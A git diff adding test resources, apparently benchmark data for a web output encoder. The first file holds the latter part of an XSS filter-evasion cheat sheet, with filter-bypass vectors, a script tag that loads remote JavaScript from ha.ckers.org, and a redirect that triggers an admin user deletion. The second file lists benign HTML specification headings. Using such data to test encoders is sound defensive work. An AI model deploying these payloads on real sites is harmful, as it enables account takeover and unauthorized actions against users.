    +DIV background-image plus extra characters +. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279): +
    +DIV expression +- a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression": +
    +STYLE +tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): + +STYLE attribute using a comment +to break up expression (Thanks to +Roman Ivanov +for this one): + +Anonymous HTML with STYLE attribute +(IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): + +IMG STYLE with expression +(this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): +exp/* +STYLE tag +(Older versions of Netscape only): + +STYLE tag using background-image + +STYLE tag using background + +Downlevel-Hidden +block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: + +BASE +tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): + +OBJECT +tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: + +Using an OBJECT tag +you can embed XSS directly (this is unverified so no browser support is added): + +Using an EMBED tag +you can embed a Flash movie that contains XSS. 
+Click here for a demo +. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: + +You can EMBED SVG +which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to +nEUrOO +for this one. + +Using ActionScript +inside flash can obfuscate your XSS vector: +a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); +XML namespace +. The htc file must be located on the same server as your XSS vector: + XSS +XML data island +with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by +Sec Consult +while auditing Yahoo: +]]> +XML data island with comment obfuscation +(this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): +<IMG SRC="javascript:alert('XSS')"> +Locally hosted XML with embedded JavaScript +that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result + +HTML+TIME in XML +. This is how +Grey Magic hacked Hotmail and Yahoo! +. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: + +Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript +file to an image as an XSS vector: + +SSI +(Server Side Includes) requires SSI to be installed on the server to use this XSS vector. 
I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: + +PHP +- requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: +alert("XSS")'); ?> +IMG Embedded +commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: + +IMG Embedded commands part II +- this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Cookie manipulation +- admittidly this is pretty obscure but I have seen a few examples where +UTF-7 +encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to +for this one). Click +for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. 
+Watchfire found this hole +in Google's custom 404 script.: + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +XSS using HTML quote encapsulation: +This was tested in IE, your mileage may vary. For performing XSS on sites that allow " +For performing XSS on sites that allow " +Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": + +Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow +And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): + +Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: + +This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: +PT SRC="http://ha.ckers.org/xss.js"> +URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): +IP verses hostname: +XSS +URL encoding: +XSS +Dword encoding (Note: there are other of variations of Dword encoding - see the +IP Obfuscation calculator below +for more details): +XSS +Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): +XSS +Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): +XSS +Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: +XSS +Protocol resolution bypass (// translates to http:// which saves a few more bytes). 
This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to +Ozh +for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +XSS +Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. +XSS +Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: +XSS +Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): +XSS +Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): +XSS +Extra dot for absolute DNS: +XSS +JavaScript link location: +XSS +Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). 
I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself ( +here is an example +) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): +XSS +Character Encoding: +All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?): +< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C +Character Encoding Calculator +ASCII Text: +Enter your XSS here +Hex Value: +URL: +HTML (with semicolons): +Decimal Value: +HTML (without semicolons): +Base64 Value +( +a more robust base64 calculator can be found here +) +Base64: +IP Obfuscation Calculator +IP Address: +: dword level +Dword Address: +Hex Address: +Octal Address: +Browser support reference table: +Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2. +Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000. +Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option. +Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional +Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional. +Vector works in Opera. 
Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional
+Vector works in older versions of Netscape 4.0 - untested.
+Note: if a vector is not marked it either does not work or it is untested.
+Written in vim, and UTF-8 encoded, for her pleasure.
+All rights reserved, all wrongs observed.
+© 1995-2008
diff --git a/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt
new file mode 100644
index 0000000..da3e2d0
--- /dev/null
+++ b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt
@@ -0,0 +1,4921 @@
+"already\n started"
+"already\n started"
+"already started"
+"current" position
+"force-async"
+"parser-inserted"
+"ready to be parser-executed"
+<fragment>
+<host>
+<hostport>
+<meta name=""\n content="">
+<path>
+<port>
+<query>
+<scheme>
+<script type="">
+5\n February 2004 W3C Patent Policy
+:active
+:checked
+:default
+:dir(ltr)
+:dir(rtl)
+:disabled
+:enabled
+:in-range
+:indeterminate
+:invalid
+:link
+:optional
+:out-of-range
+:read-only
+:read-write
+:required
+:valid
+:visited
+ERCIM
+MIT
+W3C
+Name
+application/x-www-form-urlencoded encoding\n algorithm
+application/x-www-form-urlencoded encoding\n algorithm
+data:\n URL
+data:\n URL
+data: URL
+form element\n pointer
+form element pointer
+head\n element pointer
+head element\n pointer
+head element pointer
+javascript:\n URL
+javascript: URL
+lang\n attribute in the XML namespace
+lang\n attributes in the XML namespace
+lang attribute\n in the XML namespace
+lang attribute in the\n XML namespace
+lang attribute in the XML\n namespace
+lang attributes in\n the XML namespace
+lang attributes in the\n XML namespace
+multipart/form-data boundary string
+multipart/form-data encoding\n algorithm
+multipart/form-data encoding\n algorithm
+text/plain encoding\n algorithm
+dropzone processing\n steps
+form element\n pointer
+form element pointer
+CDATASection nodes in the DOM are treated as\n equivalent to Text nodes
+MediaStream and\n PeerConnection events
+XMLHttpRequest
+form element\n pointer
+form element pointer
+head element
+hreflang\n attribute on a and area\n elements
+html element
+iframe srcdoc documents
+input type keyword
+javascript:\n URL
+javascript: URL
+in the\n Document
+parent browsing context
+W3C
+1 Introduction
+1.1 Background
+1.10 Recommended reading
+1.2 Audience
+1.3 Scope
+1.4 History
+1.5 Design notes
+1.5.1 Serializability of script execution
+1.5.2 Compliance with other specifications
+1.6 HTML vs XHTML
+1.7 Structure of this specification
+1.7.1 How to read 
this specification +1.7.2 Typographic conventions +1.8 A quick introduction to HTML +1.8.1 Writing secure applications with HTML +1.8.2 Common pitfalls to avoid when using the scripting APIs +1.9 Conformance requirements for authors +1.9.1 Presentational markup +1.9.2 Syntax errors +1.9.3 Restrictions on content models and on attribute values +10 Rendering +10.1 Introduction +10.2 The CSS user agent style sheet and presentational hints +10.3 Non-replaced elements +10.3.1 Hidden elements +10.3.10 The hr element +10.3.11 The fieldset element +10.3.2 The page +10.3.3 Flow content +10.3.4 Phrasing content +10.3.5 Bidirectional text +10.3.6 Sections and headings +10.3.7 Lists +10.3.8 Tables +10.3.9 Form controls +10.4 Replaced elements +10.4.1 Embedded content +10.4.2 Timed text tracks +10.4.2.1 WebVTT cue text rendering rules +10.4.2.2 Applying CSS properties to WebVTT Node Objects +10.4.2.3 CSS extensions +10.4.2.3.1 The '::cue' pseudo-element +10.4.2.3.2 The ':past' and ':future' pseudo-classes +10.4.3 Images +10.4.4 Attributes for embedded content and images +10.4.5 Image maps +10.4.6 Toolbars +10.5 Bindings +10.5.1 Introduction +10.5.10 The input element as a button +10.5.11 The marquee element +10.5.12 The meter element +10.5.13 The progress element +10.5.14 The select element +10.5.15 The textarea element +10.5.16 The keygen element +10.5.17 The time element +10.5.2 The button element +10.5.3 The details element +10.5.4 The input element as a text entry widget +10.5.5 The input element as domain-specific widgets +10.5.6 The input element as a range control +10.5.7 The input element as a color well +10.5.8 The input element as a checkbox and radio button widgets +10.5.9 The input element as a file upload control +10.6 Frames and framesets +10.7 Interactive media +10.7.1 Links, forms, and navigation +10.7.2 The title attribute +10.7.3 Editing hosts +10.7.4 Text rendered in native user interfaces +10.8 Print media +11 Obsolete features +11.1 Obsolete but conforming 
features +11.1.1 Warnings for obsolete but conforming features +11.2 Non-conforming features +11.3 Requirements for implementations +11.3.1 The applet element +11.3.2 The marquee element +11.3.3 Frames +11.3.4 Other elements, attributes and APIs +12 IANA considerations +12.1 text/html +12.2 multipart/x-mixed-replace +12.3 application/xhtml+xml +12.4 application/x-www-form-urlencoded +12.5 text/cache-manifest +12.6 web+ scheme prefix +2 Common infrastructure +2.1 Terminology +2.1.1 Resources +2.1.2 XML +2.1.3 DOM trees +2.1.4 Scripting +2.1.5 Plugins +2.1.6 Character encodings +2.2 Conformance requirements +2.2.1 Conformance classes +2.2.2 Dependencies +2.2.3 Extensibility +2.3 Case-sensitivity and string comparison +2.4 UTF-8 +2.5 Common microsyntaxes +2.5.1 Common parser idioms +2.5.10 Media queries +2.5.2 Boolean attributes +2.5.3 Keywords and enumerated attributes +2.5.4 Numbers +2.5.4.1 Signed integers +2.5.4.2 Non-negative integers +2.5.4.3 Floating-point numbers +2.5.4.4 Percentages and lengths +2.5.4.5 Lists of integers +2.5.4.6 Lists of dimensions +2.5.5 Dates and times +2.5.5.1 Months +2.5.5.2 Dates +2.5.5.3 Times +2.5.5.4 Local dates and times +2.5.5.5 Global dates and times +2.5.5.6 Weeks +2.5.5.7 Vaguer moments in time +2.5.6 Colors +2.5.7 Space-separated tokens +2.5.8 Comma-separated tokens +2.5.9 References +2.6 URLs +2.6.1 Terminology +2.6.2 Parsing URLs +2.6.3 Resolving URLs +2.6.4 URL manipulation and creation +2.6.5 Dynamic changes to base URLs +2.6.6 Interfaces for URL manipulation +2.7 Fetching resources +2.7.1 Protocol concepts +2.7.2 Encrypted HTTP and related security concerns +2.7.3 Determining the type of a resource +2.7.4 Extracting encodings from meta elements +2.7.5 CORS settings attributes +2.7.6 CORS-enabled fetch +2.8 Common DOM interfaces +2.8.1 Reflecting content attributes in IDL attributes +2.8.2 Collections +2.8.2.1 HTMLAllCollection +2.8.2.2 HTMLFormControlsCollection +2.8.2.3 HTMLOptionsCollection +2.8.3 DOMStringMap +2.8.4 
Transferable objects +2.8.5 Safe passing of structured data +2.8.6 DOM feature strings +2.8.7 Garbage collection +2.9 Namespaces +3 Semantics, structure, and APIs of HTML documents +3.1 Documents +3.1.1 Documents in the DOM +3.1.2 Security +3.1.3 Resource metadata management +3.1.4 DOM tree accessors +3.1.5 Loading XML documents +3.2 Elements +3.2.1 Semantics +3.2.2 Elements in the DOM +3.2.3 Global attributes +3.2.3.1 The id attribute +3.2.3.2 The title attribute +3.2.3.3 The lang and xml:lang attributes +3.2.3.4 The xml:base\n attribute (XML only) +3.2.3.5 The dir attribute +3.2.3.6 The class attribute +3.2.3.7 The style attribute +3.2.3.8 Embedding custom non-visible data with the data-* attributes +3.2.4 Element definitions +3.2.4.1 Attributes +3.2.5 Content models +3.2.5.1 Kinds of content +3.2.5.1.1 Metadata content +3.2.5.1.2 Flow content +3.2.5.1.3 Sectioning content +3.2.5.1.4 Heading content +3.2.5.1.5 Phrasing content +3.2.5.1.6 Embedded content +3.2.5.1.7 Interactive content +3.2.5.1.8 Palpable content +3.2.5.2 Transparent content models +3.2.5.3 Paragraphs +3.2.6 Requirements relating to bidirectional-algorithm formatting\n characters +3.2.7 WAI-ARIA +3.3 Interactions with XPath and XSLT +3.4 Dynamic markup insertion +3.4.1 Opening the input stream +3.4.2 Closing the input stream +3.4.3 document.write() +3.4.4 document.writeln() +4 The elements of HTML +4.1 The root element +4.1.1 The html element +4.10 Forms +4.10.1 Introduction +4.10.1.1 Writing a form's user interface +4.10.1.2 Implementing the server-side processing for a form +4.10.1.3 Configuring a form to communicate with a server +4.10.1.4 Client-side form validation +4.10.10 The datalist element +4.10.11 The optgroup element +4.10.12 The option element +4.10.13 The textarea element +4.10.14 The keygen element +4.10.15 The output element +4.10.16 The progress element +4.10.17 The meter element +4.10.18 Association of controls and forms +4.10.19 Attributes common to form controls +4.10.19.1 
Naming form controls +4.10.19.2 Enabling and disabling form controls +4.10.19.3 A form control's value +4.10.19.4 Autofocusing a form control +4.10.19.5 Limiting user input length +4.10.19.6 Form submission +4.10.19.7 Submitting element directionality +4.10.2 Categories +4.10.20 APIs for the text field selections +4.10.21 Constraints +4.10.21.1 Definitions +4.10.21.2 Constraint validation +4.10.21.3 The constraint validation API +4.10.21.4 Security +4.10.22 Form submission +4.10.22.1 Introduction +4.10.22.2 Implicit submission +4.10.22.3 Form submission algorithm +4.10.22.4 Constructing the form data set +4.10.22.5 URL-encoded form data +4.10.22.6 Multipart form data +4.10.22.7 Plain text form data +4.10.23 Resetting a form +4.10.3 The form element +4.10.4 The fieldset element +4.10.5 The legend element +4.10.6 The label element +4.10.7 The input element +4.10.7.1 States of the type attribute +4.10.7.1.1 Hidden state +4.10.7.1.10 Week state +4.10.7.1.11 Time state +4.10.7.1.12 Local Date and Time state +4.10.7.1.13 Number state +4.10.7.1.14 Range state +4.10.7.1.15 Color state +4.10.7.1.16 Checkbox state +4.10.7.1.17 Radio Button state +4.10.7.1.18 File Upload state +4.10.7.1.19 Submit Button state +4.10.7.1.2 Text state and Search state +4.10.7.1.20 Image Button state +4.10.7.1.21 Reset Button state +4.10.7.1.22 Button state +4.10.7.1.3 Telephone state +4.10.7.1.4 URL state +4.10.7.1.5 E-mail state +4.10.7.1.6 Password state +4.10.7.1.7 Date and Time state +4.10.7.1.8 Date state +4.10.7.1.9 Month state +4.10.7.2 Common input element attributes +4.10.7.2.1 The autocomplete attribute +4.10.7.2.10 The min and max attributes +4.10.7.2.11 The step attribute +4.10.7.2.12 The placeholder attribute +4.10.7.2.2 The dirname attribute +4.10.7.2.3 The list attribute +4.10.7.2.4 The readonly attribute +4.10.7.2.5 The size attribute +4.10.7.2.6 The required attribute +4.10.7.2.7 The multiple attribute +4.10.7.2.8 The maxlength attribute +4.10.7.2.9 The pattern attribute 
+4.10.7.3 Common input element APIs +4.10.7.4 Common event behaviors +4.10.8 The button element +4.10.9 The select element +4.11 Interactive elements +4.11.1 The details element +4.11.2 The summary element +4.11.3 The command element +4.11.4 The menu element +4.11.4.1 Introduction +4.11.4.2 Building menus and toolbars +4.11.4.3 Context menus +4.11.4.4 Toolbars +4.11.5 Commands +4.11.5.1 Using the a element to define a command +4.11.5.2 Using the button element to define a command +4.11.5.3 Using the input element to define a command +4.11.5.4 Using the option element to define a command +4.11.5.5 Using the command element to define\n a command +4.11.5.6 Using the accesskey attribute on a label element to define a command +4.11.5.7 Using the accesskey attribute on a legend element to define a command +4.11.5.8 Using the accesskey attribute to define a command on other elements +4.12 Links +4.12.1 Introduction +4.12.2 Links created by a and area elements +4.12.3 Following hyperlinks +4.12.4 Link types +4.12.4.1 Link type "alternate" +4.12.4.10 Link type "search" +4.12.4.11 Link type "stylesheet" +4.12.4.12 Link type "tag" +4.12.4.13 Sequential link types +4.12.4.13.1 Link type "next" +4.12.4.13.2 Link type "prev" +4.12.4.14 Other link types +4.12.4.2 Link type "author" +4.12.4.3 Link type "bookmark" +4.12.4.4 Link type "help" +4.12.4.5 Link type "icon" +4.12.4.6 Link type "license" +4.12.4.7 Link type "nofollow" +4.12.4.8 Link type "noreferrer" +4.12.4.9 Link type "prefetch" +4.13 Common idioms without dedicated elements +4.13.1 The main part of the content +4.13.2 Bread crumb navigation +4.13.3 Tag clouds +4.13.4 Conversations +4.13.5 Footnotes +4.14 Matching HTML elements using selectors +4.14.1 Case-sensitivity +4.14.2 Pseudo-classes +4.2 Document metadata +4.2.1 The head element +4.2.2 The title element +4.2.3 The base element +4.2.4 The link element +4.2.5 The meta element +4.2.5.1 Standard metadata names +4.2.5.2 Other metadata names +4.2.5.3 Pragma directives 
+4.2.5.4 Other pragma directives +4.2.5.5 Specifying the document's character encoding +4.2.6 The style element +4.2.7 Styling +4.3 Scripting +4.3.1 The script element +4.3.1.1 Scripting languages +4.3.1.2 Restrictions for contents of script elements +4.3.1.3 Inline documentation for external scripts +4.3.1.4 Interaction of script elements and XSLT +4.3.2 The noscript element +4.4 Sections +4.4.1 The body element +4.4.10 The address element +4.4.11 Headings and sections +4.4.11.1 Creating an outline +4.4.2 The section element +4.4.3 The nav element +4.4.4 The article element +4.4.5 The aside element +4.4.6 The h1, h2, h3, h4, h5, and h6 elements +4.4.7 The hgroup element +4.4.8 The header element +4.4.9 The footer element +4.5 Grouping content +4.5.1 The p element +4.5.10 The dd element +4.5.11 The figure element +4.5.12 The figcaption element +4.5.13 The div element +4.5.2 The hr element +4.5.3 The pre element +4.5.4 The blockquote element +4.5.5 The ol element +4.5.6 The ul element +4.5.7 The li element +4.5.8 The dl element +4.5.9 The dt element +4.6 Text-level semantics +4.6.1 The a element +4.6.10 The time element +4.6.11 The code element +4.6.12 The var element +4.6.13 The samp element +4.6.14 The kbd element +4.6.15 The sub and sup elements +4.6.16 The i element +4.6.17 The b element +4.6.18 The u element +4.6.19 The mark element +4.6.2 The em element +4.6.20 The ruby element +4.6.21 The rt element +4.6.22 The rp element +4.6.23 The bdi element +4.6.24 The bdo element +4.6.25 The span element +4.6.26 The br element +4.6.27 The wbr element +4.6.28 Usage summary +4.6.3 The strong element +4.6.4 The small element +4.6.5 The s element +4.6.6 The cite element +4.6.7 The q element +4.6.8 The dfn element +4.6.9 The abbr element +4.7 Edits +4.7.1 The ins element +4.7.2 The del element +4.7.3 Attributes common to ins and del elements +4.7.4 Edits and paragraphs +4.7.5 Edits and lists +4.7.6 Edits and tables +4.8 Embedded content +4.8.1 The img element +4.8.1.1 
Requirements for providing text to act as an alternative for images +4.8.1.1.1 General guidelines +4.8.1.1.10 A key part of the content +4.8.1.1.11 An image not intended for the user +4.8.1.1.12 Guidance for markup generators +4.8.1.1.13 Guidance for conformance checkers +4.8.1.1.2 A link or button containing nothing but the image +4.8.1.1.3 A phrase or paragraph with an alternative graphical representation: charts, diagrams, graphs, maps, illustrations +4.8.1.1.4 A short phrase or label with an alternative graphical representation: icons, logos +4.8.1.1.5 Text that has been rendered to a graphic for typographical effect +4.8.1.1.6 A graphical representation of some of the surrounding text +4.8.1.1.7 A purely decorative image that doesn't add any information +4.8.1.1.8 A group of images that form a single larger picture with no links +4.8.1.1.9 A group of images that form a single larger picture with links +4.8.10 Media elements +4.8.10.1 Error codes +4.8.10.10 Media resources with multiple media tracks +4.8.10.10.1 AudioTrackList and VideoTrackList objects +4.8.10.10.2 Selecting specific audio and video tracks declaratively +4.8.10.11 Synchronising multiple media elements +4.8.10.11.1 Introduction +4.8.10.11.2 Media controllers +4.8.10.11.3 Assigning a media controller declaratively +4.8.10.12 Timed text tracks +4.8.10.12.1 Text track model +4.8.10.12.2 Sourcing in-band text tracks +4.8.10.12.3 Sourcing out-of-band text tracks +4.8.10.12.4 Text track API +4.8.10.12.5 Text tracks describing chapters +4.8.10.12.6 Event definitions +4.8.10.13 User interface +4.8.10.14 Time ranges +4.8.10.15 Event definitions +4.8.10.16 Event summary +4.8.10.17 Security and privacy considerations +4.8.10.18 Best practices for authors using media elements +4.8.10.19 Best practices for implementors of media elements +4.8.10.2 Location of the media resource +4.8.10.3 MIME types +4.8.10.4 Network states +4.8.10.5 Loading the media resource +4.8.10.6 Offsets into the media resource 
+4.8.10.7 Ready states +4.8.10.8 Playing the media resource +4.8.10.9 Seeking +4.8.11 The canvas element +4.8.11.1 Color spaces and color correction +4.8.11.2 Security with canvas elements +4.8.12 The map element +4.8.13 The area element +4.8.14 Image maps +4.8.14.1 Authoring +4.8.14.2 Processing model +4.8.15 MathML +4.8.16 SVG +4.8.17 Dimension attributes +4.8.2 The iframe element +4.8.3 The embed element +4.8.4 The object element +4.8.5 The param element +4.8.6 The video element +4.8.7 The audio element +4.8.8 The source element +4.8.9 The track element +4.9 Tabular data +4.9.1 The table element +4.9.1.1 Techniques for describing tables +4.9.1.2 Techniques for table layout +4.9.10 The th element +4.9.11 Attributes common to td and th elements +4.9.12 Processing model +4.9.12.1 Forming a table +4.9.12.2 Forming relationships between data cells and header cells +4.9.13 Examples +4.9.2 The caption element +4.9.3 The colgroup element +4.9.4 The col element +4.9.5 The tbody element +4.9.6 The thead element +4.9.7 The tfoot element +4.9.8 The tr element +4.9.9 The td element +5 Loading Web pages +5.1 Browsing contexts +5.1.1 Nested browsing contexts +5.1.1.1 Navigating nested browsing contexts in the DOM +5.1.2 Auxiliary browsing contexts +5.1.2.1 Navigating auxiliary browsing contexts in the DOM +5.1.3 Secondary browsing contexts +5.1.4 Security +5.1.5 Groupings of browsing contexts +5.1.6 Browsing context names +5.2 The Window object +5.2.1 Security +5.2.2 APIs for creating and navigating browsing contexts by name +5.2.3 Accessing other browsing contexts +5.2.4 Named access on the Window object +5.2.5 Garbage collection and browsing contexts +5.2.6 Browser interface elements +5.2.7 The WindowProxy object +5.3 Origin +5.3.1 Relaxing the same-origin restriction +5.4 Session history and navigation +5.4.1 The session history of browsing contexts +5.4.2 The History interface +5.4.3 The Location interface +5.4.3.1 Security +5.4.4 Implementation notes for session history 
+5.5 Browsing the Web +5.5.1 Navigating across documents +5.5.10 History traversal +5.5.10.1 Event definitions +5.5.11 Unloading documents +5.5.11.1 Event definition +5.5.12 Aborting a document load +5.5.2 Page load processing model for HTML files +5.5.3 Page load processing model for XML files +5.5.4 Page load processing model for text files +5.5.5 Page load processing model for multipart/x-mixed-replace resources +5.5.6 Page load processing model for media +5.5.7 Page load processing model for content that uses plugins +5.5.8 Page load processing model for inline content that doesn't have a DOM +5.5.9 Navigating to a fragment identifier +5.6 Offline Web applications +5.6.1 Introduction +5.6.1.1 Event summary +5.6.10 Browser state +5.6.2 Application caches +5.6.3 The cache manifest syntax +5.6.3.1 Some sample manifests +5.6.3.2 Writing cache manifests +5.6.3.3 Parsing cache manifests +5.6.4 Downloading or updating an application cache +5.6.5 The application cache selection algorithm +5.6.6 Changes to the networking model +5.6.7 Expiring application caches +5.6.8 Disk space +5.6.9 Application cache API +6 Web application APIs +6.1 Scripting +6.1.1 Introduction +6.1.2 Enabling and disabling scripting +6.1.3 Processing model +6.1.3.1 Definitions +6.1.3.2 Calling scripts +6.1.3.3 Creating scripts +6.1.3.4 Killing scripts +6.1.3.5 Runtime script errors +6.1.3.5.1 Runtime script errors in documents +6.1.4 Event loops +6.1.4.1 Definitions +6.1.4.2 Processing model +6.1.4.3 Generic task sources +6.1.5 The javascript: URL scheme +6.1.6 Events +6.1.6.1 Event handlers +6.1.6.2 Event handlers on elements, Document objects, and Window objects +6.1.6.3 Event firing +6.1.6.4 Events and the Window object +6.2 Base64 utility methods +6.3 Timers +6.4 User prompts +6.4.1 Simple dialogs +6.4.2 Printing +6.4.3 Dialogs implemented using separate documents +6.5 System state and capabilities +6.5.1 The Navigator object +6.5.1.1 Client identification +6.5.1.2 Custom scheme and content 
handlers +6.5.1.3 Security and privacy +6.5.1.4 Sample user interface +6.5.1.5 Manually releasing the storage mutex +6.5.2 The External interface +7 User interaction +7.1 The hidden attribute +7.2 Activation +7.3 Focus +7.3.1 Sequential focus navigation and the tabindex attribute +7.3.2 Focus management +7.3.3 Document-level focus APIs +7.3.4 Element-level focus APIs +7.4 Assigning keyboard shortcuts +7.4.1 Introduction +7.4.2 The accesskey attribute +7.4.3 Processing model +7.5 Editing +7.5.1 Making document regions editable: The contenteditable content\n attribute +7.5.2 Making entire documents editable: The designMode IDL attribute +7.5.3 Best practices for in-page editors +7.5.4 Editing APIs +7.5.5 Spelling and grammar checking +7.6 Drag and drop +7.6.1 Introduction +7.6.2 The drag data store +7.6.3 The DataTransfer interface +7.6.3.1 The DataTransferItemList interface +7.6.3.2 The DataTransferItem interface +7.6.4 The DragEvent interface +7.6.5 Drag-and-drop processing model +7.6.6 Events summary +7.6.7 The draggable attribute +7.6.8 The dropzone attribute +7.6.9 Security risks in the drag-and-drop model +8 The HTML syntax +8.1 Writing HTML documents +8.1.1 The DOCTYPE +8.1.2 Elements +8.1.2.1 Start tags +8.1.2.2 End tags +8.1.2.3 Attributes +8.1.2.4 Optional tags +8.1.2.5 Restrictions on content models +8.1.2.6 Restrictions on the contents of raw text and RCDATA elements +8.1.3 Text +8.1.3.1 Newlines +8.1.4 Character references +8.1.5 CDATA sections +8.1.6 Comments +8.2 Parsing HTML documents +8.2.1 Overview of the parsing model +8.2.2 The input stream +8.2.2.1 Determining the character encoding +8.2.2.2 Character encodings +8.2.2.3 Preprocessing the input stream +8.2.2.4 Changing the encoding while parsing +8.2.3 Parse state +8.2.3.1 The insertion mode +8.2.3.2 The stack of open elements +8.2.3.3 The list of active formatting elements +8.2.3.4 The element pointers +8.2.3.5 Other parsing state flags +8.2.4 Tokenization +8.2.4.1 Data state +8.2.4.10 Tag name 
